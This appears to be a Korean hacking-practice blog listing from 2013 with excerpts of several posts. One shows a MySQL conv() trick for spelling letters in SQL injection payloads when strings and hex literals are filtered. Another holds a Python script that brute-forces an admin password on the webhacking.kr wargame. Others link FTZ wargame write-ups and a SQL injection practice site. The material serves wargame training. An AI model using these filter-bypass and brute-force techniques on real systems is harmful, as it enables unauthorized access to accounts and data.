본문 바로가기

전체170

SQL injection Skill Note A~Z문자열을 쓸수없고 Hex(),0x를 사용하지못하는 상황에선 아래를 사용해볼 필요성이 있다.conv(10,10,36) -> Aconv(11,10,36) -> Bconv(12,10,36) -> Cconv(13,10,36) -> Dconv(14,10,36) -> Econv(15,10,36) -> Fconv(16,10,36) -> Gconv(17,10,36) -> Hconv(18,10,36) -> Iconv(19,10,36) -> Jconv(20,10,36) -> Kconv(21,10,36) -> Lconv(22,10,36) -> Mconv(23,10,36) -> Nconv(24,10,36) -> Oconv(25,10,36) -> Pconv(26,10,36) -> Qconv(27,10,36) -> Rcon.. 2013. 9. 15.
[Python] Http BruteForce 예제 import httplib import time headers = { 'Host':'webhacking.kr', 'Cookie':'PHPSESSID=사용자 쿠키값; notice=yes' } conn = httplib.HTTPConnection('webhacking.kr', 80) for i in range(2000, 3000): conn.request('GET', '/challenge/web/web-04/index.php?cid=admin&cpw=%s'%i,'', headers) #request argv[2] == body OK? r = conn.getresponse() res=r.read() # print res # time.sleep(1) if(not res.find('Wrong')+1): print.. 2013. 7. 31.
Hackerschool FTZ 풀이 FTZ level1 풀이FTZ level2 풀이FTZ level3 풀이FTZ level4 풀이FTZ level5 풀이FTZ level6 풀이FTZ level7 풀이FTZ level8 풀이FTZ level9 풀이FTZ level10 풀이FTZ level11풀이FTZ level12풀이FTZ level13풀이FTZ level14 풀이FTZ level15 풀이FTZ level16 풀이FTZ level17 풀이FTZ level18 풀이FTZ level19 풀이FTZ level20 풀이 쉘코드는 자유입니다..20번 풀이는 다른 문서를 보셔야 이해가능합니다. 2013. 7. 21.
New SQL Injection Site itchy.dothome.co.kr 접속후STAGE 클릭하신뒤 problem 1부터 풀어나가시면됩니다.점점 난이도가 상향됩니다.~~ 2013. 1. 31.
반응형